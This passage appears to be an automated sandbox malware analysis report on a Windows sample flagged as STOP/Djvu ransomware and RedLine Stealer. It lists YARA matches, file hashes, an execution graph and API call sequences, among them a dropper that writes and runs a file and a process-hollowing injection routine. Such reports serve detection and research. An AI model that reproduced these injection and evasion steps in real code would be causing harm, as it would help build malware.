                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.1498273740.0000000002201000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Has exited:true

                  General

                  Target ID:30
                  Start time:21:35:56
                  Start date:25/07/2024
                  Path:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart
                  Imagebase:0x400000
                  File size:810'496 bytes
                  MD5 hash:3A11D47AD1A6093DDFE84E48E77554F3
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.1%
                    Dynamic/Decrypted Code Coverage:27.7%
                    Signature Coverage:46.8%
                    Total number of Nodes:141
                    Total number of Limit Nodes:26
                    execution_graph 48486 40a860 48491 4111f0 48486->48491 48492 411231 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 48491->48492 48493 411212 48491->48493 48494 411293 48492->48494 48493->48492 48495 40a86a 48493->48495 48494->48495 48496 40a880 GetStartupInfoW 48495->48496 48497 40a8fc _check_managed_app 48496->48497 48523 4119e0 HeapCreate 48497->48523 48500 40a912 48530 40aa60 GetModuleHandleW GetProcAddress ExitProcess ___crtExitProcess 48500->48530 48501 40a919 48531 40e4a0 32 API calls 7 library calls 48501->48531 48504 40a921 48506 40a92c __RTC_Initialize 48504->48506 48532 40aa60 GetModuleHandleW GetProcAddress ExitProcess ___crtExitProcess 48504->48532 48533 410c40 6 API calls 2 library calls 48506->48533 48508 40a94a 48534 4119b0 GetCommandLineW 48508->48534 48510 40a95d 48535 411900 GetEnvironmentStringsW FreeEnvironmentStringsW FreeEnvironmentStringsW ___crtGetEnvironmentStringsW __malloc_dbg 48510->48535 48512 40a967 48536 411510 GetModuleFileNameW _wparse_cmdline __malloc_dbg ___wsetargv 48512->48536 48514 40a971 48537 411370 16 API calls 4 library calls 48514->48537 48516 40a984 48538 409ea0 56 API calls 5 library calls 48516->48538 48518 40a9f7 48540 409f80 75 API calls _doexit 48518->48540 48519 40a999 __wwincmdln 48519->48518 48539 409f40 75 API calls _doexit 48519->48539 48522 40a86f 48524 40a90b 48523->48524 48525 411a0e __heap_init 48523->48525 48524->48500 48524->48501 48525->48524 48526 411a21 48525->48526 48541 4129e0 HeapAlloc 48526->48541 48528 411a2b 48528->48524 48529 411a32 HeapDestroy 48528->48529 48529->48524 48530->48501 48531->48504 48532->48506 48533->48508 48534->48510 48535->48512 48536->48514 48537->48516 48538->48519 48539->48518 48540->48522 48541->48528 48542 2153026 48543 2153035 48542->48543 48546 21537c6 48543->48546 48547 21537e1 48546->48547 48548 21537ea CreateToolhelp32Snapshot 48547->48548 48549 2153806 Module32First 48547->48549 48548->48547 48548->48549 48550 2153815 48549->48550 48552 215303e 48549->48552 48553 2153485 48550->48553 48554 21534b0 48553->48554 48555 21534c1 VirtualAlloc 48554->48555 48556 21534f9 48554->48556 48555->48556 48557 409685 48590 40a540 53 API calls 6 library calls 48557->48590 48559 40968e 48609 40a4f0 MoveFileA GetLastError 48559->48609 48561 409697 48591 409f40 75 API calls _doexit 48561->48591 48563 4096c8 13 API calls 48564 4096a1 48563->48564 48564->48563 48565 4097e2 48564->48565 48566 4097f8 CharUpperW GetLastError 48565->48566 48567 409811 48565->48567 48566->48565 48568 409838 48567->48568 48569 40984f 15 API calls 48567->48569 48570 409901 48567->48570 48568->48567 48569->48567 48592 4093d0 GlobalAlloc 48570->48592 48572 409906 48573 409919 SetProcessPriorityBoost 48572->48573 48574 409925 48572->48574 48575 40993a 48572->48575 48573->48572 48574->48572 48576 409960 FreeEnvironmentStringsA 48575->48576 48577 409970 ConvertFiberToThread QueryDepthSList DeleteCriticalSection 48575->48577 48578 40998f 48575->48578 48576->48575 48577->48575 48579 409999 48578->48579 48580 4099af 48578->48580 48579->48580 48610 4091d0 14 API calls 48579->48610 48582 4099cc GetThreadContext OpenMutexW 48580->48582 48583 4099de 48580->48583 48582->48580 48593 409310 LoadLibraryA VirtualProtect 48583->48593 48585 4099e3 48594 4093f0 48585->48594 48588 4099f5 19 API calls 48589 409ab8 48588->48589 48590->48559 48591->48564 48592->48572 48593->48585 48595 409410 SetLastError 48594->48595 48596 409441 SetLastError 48595->48596 48597 40941d SetConsoleCursorInfo DebugBreak SetCalendarInfoW GetPrivateProfileIntA 48595->48597 48598 409451 CopyFileA GetSystemWow64DirectoryW GetStartupInfoA 48596->48598 48599 409478 48596->48599 48597->48596 48598->48599 48599->48595 48600 409489 48599->48600 48611 409030 48600->48611 48602 4094a0 48603 4094b9 InterlockedDecrement SetConsoleWindowInfo GlobalUnfix 48602->48603 48604 4094e9 48602->48604 48603->48602 48605 40951c TerminateThread GetUserDefaultLCID WritePrivateProfileStringA GetNamedPipeHandleStateA 48604->48605 48606 409557 LoadLibraryA 48604->48606 48605->48604 48607 409653 48606->48607 48608 4095c8 9 API calls 48606->48608 48607->48588 48607->48589 48608->48607 48609->48561 48610->48579 48612 409042 VerLanguageNameW SetDefaultCommConfigW ReadConsoleOutputCharacterA 48611->48612 48614 409088 48611->48614 48612->48614 48613 4091c2 48613->48602 48614->48613 48615 4090ce BuildCommDCBW CopyFileExW GetCompressedFileSizeA 48614->48615 48619 4090fa 48614->48619 48615->48619 48616 409106 FindNextFileA SetEvent 48616->48619 48617 409127 6 API calls 48617->48619 48619->48614 48619->48616 48619->48617 48620 40918d FillConsoleOutputCharacterA 48619->48620 48621 4091be 48619->48621 48622 408e80 7 API calls 48619->48622 48620->48619 48621->48613 48622->48619 48623 4ed000 48625 4ed044 GetPEB 48623->48625 48631 4ed077 CreateFileA 48625->48631 48627 4ed22d 48629 4ed246 WriteFile 48627->48629 48632 4ed244 48627->48632 48628 4ed265 48630 4ed255 FindCloseChangeNotification WinExec 48629->48630 48630->48628 48631->48627 48631->48628 48632->48630 48633 21f0000 48636 21f0630 48633->48636 48635 21f0005 48637 21f064c 48636->48637 48639 21f1577 48637->48639 48642 21f05b0 48639->48642 48645 21f05dc 48642->48645 48643 21f061e 48644 21f05e2 GetFileAttributesA 48644->48645 48645->48643 48645->48644 48647 21f0420 48645->48647 48648 21f04f3 48647->48648 48649 21f04ff CreateWindowExA 48648->48649 48650 21f04fa 48648->48650 48649->48650 48651 21f0540 PostMessageA 48649->48651 48650->48645 48652 21f055f 48651->48652 48652->48650 48654 21f0110 VirtualAlloc 48652->48654 48655 21f016e 48654->48655 48656 21f0414 48655->48656 48657 21f024a CreateProcessA 48655->48657 48656->48652 48657->48656 48658 21f025f VirtualFree VirtualAlloc Wow64GetThreadContext 48657->48658 48658->48656 48659 21f02a9 ReadProcessMemory 48658->48659 48660 21f02e5 VirtualAllocEx NtWriteVirtualMemory 48659->48660 48661 21f02d5 NtUnmapViewOfSection 48659->48661 48664 21f033b 48660->48664 48661->48660 48662 21f039d WriteProcessMemory Wow64SetThreadContext ResumeThread 48665 21f03fb ExitProcess 48662->48665 48663 21f0350 NtWriteVirtualMemory 48663->48664 48664->48662 48664->48663

                    Executed Functions

                    Function 004ED044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171fileprocessCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 23 4ed044-4ed074 GetPEB 24 4ed077-4ed09a 23->24 25 4ed09d-4ed0a0 24->25 26 4ed1ee-4ed22b CreateFileA 25->26 27 4ed0a6-4ed0bc 25->27 50 4ed22d-4ed230 26->50 51 4ed265-4ed269 26->51 28 4ed0be-4ed0c5 27->28 29 4ed110-4ed116 27->29 28->29 30 4ed0c7-4ed0ce 28->30 32 4ed118-4ed11f 29->32 33 4ed129-4ed12f 29->33 30->29 34 4ed0d0-4ed0d7 30->34 32->33 35 4ed121-4ed124 32->35 36 4ed148-4ed14e 33->36 37 4ed131-4ed138 33->37 34->29 40 4ed0d9-4ed0dd 34->40 42 4ed1bb-4ed1c0 35->42 38 4ed167-4ed16f 36->38 39 4ed150-4ed157 36->39 37->36 43 4ed13a-4ed141 37->43 47 4ed188-4ed18e 38->47 48 4ed171-4ed178 38->48 39->38 46 4ed159-4ed160 39->46 40->29 49 4ed0df-4ed0e3 40->49 44 4ed1c2-4ed1c5 42->44 45 4ed1e0-4ed1e9 42->45 43->36 52 4ed143-4ed146 43->52 44->45 53 4ed1c7-4ed1ca 44->53 45->25 46->38 54 4ed162-4ed165 46->54 57 4ed1a7-4ed1ad 47->57 58 4ed190-4ed197 47->58 48->47 55 4ed17a-4ed181 48->55 49->42 56 4ed0e9-4ed10b 49->56 59 4ed232-4ed238 50->59 52->42 53->45 60 4ed1cc-4ed1cf 53->60 54->42 55->47 61 4ed183-4ed186 55->61 56->24 57->42 63 4ed1af-4ed1b6 57->63 58->57 62 4ed199-4ed1a0 58->62 64 4ed23a-4ed242 59->64 65 4ed246-4ed252 WriteFile 59->65 60->45 67 4ed1d1-4ed1d4 60->67 61->42 62->57 69 4ed1a2-4ed1a5 62->69 63->42 70 4ed1b8 63->70 64->59 71 4ed244 64->71 66 4ed255-4ed262 FindCloseChangeNotification WinExec 65->66 66->51 67->45 72 4ed1d6-4ed1d9 67->72 69->42 70->42 71->66 72->45 73 4ed1db-4ed1de 72->73 73->26 73->45
                    APIs
                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004ED223
                    • WriteFile.KERNELBASE(00000000,FFF1D5EF,00003E00,?,00000000), ref: 004ED252
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004ED256
                    • WinExec.KERNEL32(?,00000005), ref: 004ED262
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                    • String ID: .dll$Clos$Crea$GetM$GetT$HhVfIB.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                    • API String ID: 2234911746-1639754508
                    • Opcode ID: d6d99adc98d23ee5eedd9381c5dc1e12da9824b906108a3c44b22f52e61dc0b5
                    • Instruction ID: 5f4d80ba8378ab4b36071f77e88593ba20aaf3570f022df9bf4ba6b47e7c8d5d
                    • Opcode Fuzzy Hash: d6d99adc98d23ee5eedd9381c5dc1e12da9824b906108a3c44b22f52e61dc0b5
                    • Instruction Fuzzy Hash: B5615E74D00255DBCF24CF96C984AAEF7B0BF48316F2482ABD505AB301C7389E81CB99
                    Function 021F0110 Relevance: 21.2, APIs: 14, Instructions: 248memorynativethreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021F0156
                    • CreateProcessA.KERNELBASE(?,00000000), ref: 021F0255
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021F0270
                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021F0283
                    • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 021F029F
                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021F02C8
                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021F02E3
                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021F0304
                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021F032A
                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021F0399
                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021F03BF
                    • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 021F03E1
                    • ResumeThread.KERNELBASE(00000000), ref: 021F03ED
                    • ExitProcess.KERNEL32(00000000), ref: 021F0412
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
                    • String ID:
                    • API String ID: 3993611425-0
                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction ID: 323c22e364aa7deb38be8112891509d65c6932ea176385c924f7c6be0e758af7
                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                    • Instruction Fuzzy Hash: B8B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E649AB395D771AE41CF94
                    Function 021537C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 241 21537c6-21537df 242 21537e1-21537e3 241->242 243 21537e5 242->243 244 21537ea-21537f6 CreateToolhelp32Snapshot 242->244 243->244 245 2153806-2153813 Module32First 244->245 246 21537f8-21537fe 244->246 247 2153815-2153816 call 2153485 245->247 248 215381c-2153824 245->248 246->245 252 2153800-2153804 246->252 253 215381b 247->253 252->242 252->245 253->248
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021537EE
                    • Module32First.KERNEL32(00000000,00000224), ref: 0215380E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2153000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 2d4d88de76d3912cc6ffe8364c06086115e1559e496baf6224258f7aa6c6c835
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 79F09C31540720AFD7203BF5988DB6EB6E8EF45665F1006F8E972920C0D774E8454661
                    Function 004093F0 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 175filelibrarypipeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • SetLastError.KERNEL32(00000000,771B3020,771C38D0,00000000,001756BA), ref: 00409412
                    • SetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 00409421
                    • DebugBreak.KERNEL32 ref: 00409423
                    • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040942D
                    • GetPrivateProfileIntA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040943B
                    • SetLastError.KERNEL32(00000000), ref: 00409443
                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00409457
                    • GetSystemWow64DirectoryW.KERNEL32(?,00000000), ref: 00409467
                    • GetStartupInfoA.KERNEL32(?), ref: 00409472
                    • InterlockedDecrement.KERNEL32(00000000), ref: 004094BB
                    • SetConsoleWindowInfo.KERNEL32(00000000,00000000,?), ref: 004094C6
                    • GlobalUnfix.KERNEL32(?), ref: 004094CD
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00409520
                    • GetUserDefaultLCID.KERNEL32 ref: 00409522
                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040952C
                    • GetNamedPipeHandleStateA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040954E
                    • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 004095AE
                    • GetModuleHandleA.KERNEL32(yebufilalib), ref: 004095CD
                    • SetDllDirectoryW.KERNEL32(00000000), ref: 004095D5
                    • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004095EF
                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409601
                    • VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00409615
                    • FindFirstChangeNotificationW.KERNEL32(Dudo cebofuzi,00000000,00000000), ref: 00409624
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00409631
                    • GlobalUnfix.KERNEL32(00000000), ref: 00409639
                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 0040964D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: Info$ConsoleDirectoryErrorGlobalHandleInterlockedLastPrivateProfileUnfixVerifyVersion$BreakCalendarChangeCopyCursorDebugDecrementDefaultExchangeFileFindFirstFormatLibraryLoadMessageModuleNamedNotificationPathPipeSearchStartupStateStringSystemTerminateThreadUserWindowWow64Write
                    • String ID: Dudo cebofuzi$msimg32.dll$yebufilalib$u7
                    • API String ID: 3970377180-621095796
                    • Opcode ID: bae738cacaec4cf74d90ef48706c73a1d19f790d6f8e499ea1363877741378ff
                    • Instruction ID: 24c17d4d41fdcea58a233e92e47c4f216694a00c84b0ad6ee980274dab1097ec
                    • Opcode Fuzzy Hash: bae738cacaec4cf74d90ef48706c73a1d19f790d6f8e499ea1363877741378ff
                    • Instruction Fuzzy Hash: 1F51B6316483C0BFE3209BA4DD46F9A37A4A788B05F144539F3857A5E2C7F46984CB6E
                    Function 0040A880 Relevance: 18.1, APIs: 12, Instructions: 114COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetStartupInfoW.KERNEL32(?,3C0B72C1), ref: 0040A8C7
                    • _check_managed_app.LIBCMTD ref: 0040A8FC
                    • __heap_init.LIBCMTD ref: 0040A906
                      • Part of subcall function 004119E0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A90B,00000001), ref: 004119F6
                    • _fast_error_exit.LIBCMTD ref: 0040A914
                      • Part of subcall function 0040AA60: ___crtExitProcess.LIBCMTD ref: 0040AA84
                    • __mtinit.LIBCMTD ref: 0040A91C
                    • _fast_error_exit.LIBCMTD ref: 0040A927
                    • __RTC_Initialize.LIBCMTD ref: 0040A939
                    • ___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A962
                    • ___wsetargv.LIBCMTD ref: 0040A96C
                    • __wsetenvp.LIBCMTD ref: 0040A97F
                    • __cinit.LIBCMTD ref: 0040A994
                    • __wwincmdln.LIBCMTD ref: 0040A9B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInfoInitializeProcessStartupStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
                    • String ID:
                    • API String ID: 104951373-0
                    • Opcode ID: f17a285fac6a69ab7ee7f2f0d4139154bfd9963f937f84ed79019beed7b82979
                    • Instruction ID: e65f7224259d5283fb2e3d7e9b85505f6464fb42361d4a6e8e525391b9afc257
                    • Opcode Fuzzy Hash: f17a285fac6a69ab7ee7f2f0d4139154bfd9963f937f84ed79019beed7b82979
                    • Instruction Fuzzy Hash: 9B41B4F1E003099BDB10EBF2DD02B9E76B4AB0431CF14453EE519B72C2EA795951CB9A
                    Function 0040A8F5 Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 152 40a8f5-40a8fc call 40aa90 155 40a901-40a906 call 4119e0 152->155 157 40a90b-40a910 155->157 158 40a912-40a919 call 40aa60 157->158 159 40a91c 157->159 158->159 161 40a91c call 40e4a0 159->161 163 40a921-40a923 161->163 164 40a925-40a92c call 40aa60 163->164 165 40a92f-40a94c call 40d0d0 call 40e000 call 410c40 163->165 164->165 174 40a958-40a967 call 4119b0 call 411900 165->174 175 40a94e-40a955 call 409fc0 165->175 182 40a96c call 411510 174->182 175->174 183 40a971-40a973 182->183 184 40a975-40a97c call 409fc0 183->184 185 40a97f-40a986 call 411370 183->185 184->185 190 40a992-40a9a3 call 409ea0 185->190 191 40a988-40a98f call 409fc0 185->191 196 40a9b1-40a9bf call 4112d0 190->196 197 40a9a5-40a9ae call 409fc0 190->197 191->190 202 40a9c1-40a9c8 196->202 203 40a9ca 196->203 197->196 204 40a9d1-40a9ec call 409660 202->204 203->204 207 40a9f7-40aa58 call 409f80 204->207 208 40a9ee-40a9f2 call 409f40 204->208 208->207
                    APIs
                    • _check_managed_app.LIBCMTD ref: 0040A8FC
                    • __heap_init.LIBCMTD ref: 0040A906
                      • Part of subcall function 004119E0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A90B,00000001), ref: 004119F6
                    • _fast_error_exit.LIBCMTD ref: 0040A914
                      • Part of subcall function 0040AA60: ___crtExitProcess.LIBCMTD ref: 0040AA84
                    • __mtinit.LIBCMTD ref: 0040A91C
                    • _fast_error_exit.LIBCMTD ref: 0040A927
                    • __RTC_Initialize.LIBCMTD ref: 0040A939
                    • ___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A962
                    • ___wsetargv.LIBCMTD ref: 0040A96C
                    • __wsetenvp.LIBCMTD ref: 0040A97F
                    • __cinit.LIBCMTD ref: 0040A994
                    • __wwincmdln.LIBCMTD ref: 0040A9B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1275332389.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1275291244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275371725.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004B8000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275564637.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275681298.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275733734.00000000004ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1275899072.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Similarity
                    • API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
                    • String ID:
                    • API String ID: 2562088257-0
                    • Opcode ID: 9b0d097662202b94e05778b8353a97980815f8383aab2055aa54bdbad2e933fc
                    • Instruction ID: 49eef360ab1ecd28c5d9102f5b1a8839826c99541b0b80a5d5069301a9ce1489
                    • Opcode Fuzzy Hash: 9b0d097662202b94e05778b8353a97980815f8383aab2055aa54bdbad2e933fc
                    • Instruction Fuzzy Hash: 163175F1E003059AEB10BBF2990379E7260AB1031CF14493FE519BA2C3FA795955CB9B
                    Function 021F0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 214 21f0420-21f04f8 216 21f04ff-21f053c CreateWindowExA 214->216 217 21f04fa 214->217 219 21f053e 216->219 220 21f0540-21f0558 PostMessageA 216->220 218 21f05aa-21f05ad 217->218 219->218 221 21f055f-21f0563 220->221 221->218 222 21f0565-21f0579 221->222 222->218 224 21f057b-21f0582 222->224 225 21f05a8 224->225 226 21f0584-21f0588 224->226 225->221 226->225 227 21f058a-21f0591 226->227 227->225 228 21f0593-21f0597 call 21f0110 227->228 230 21f059c-21f05a5 228->230 230->225
                    APIs
                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021F0533
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_21f0000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateWindow
                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                    • API String ID: 716092398-2341455598
                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction ID: 984d39b652c45c186ee0b0329ad73f20c450e5d28a2990cd8c437d2fb5374615
                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction Fuzzy Hash: 71513870D48388DEEB11CBE8C848BDDBFB2AF15708F144058D5546F29AC3FA5659CB62
                    Function 00409310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36librarymemoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 409310-4093c4 LoadLibraryA VirtualProtect
                    APIs
                    • LoadLibraryA.KERNELBASE(msimg32.dll,?,004099E3), ref: 0040936D
                    • VirtualProtect.KERNELBASE(?,00091160,00000040,00000000,?,004099E3), ref: 004093BD
                    Strings
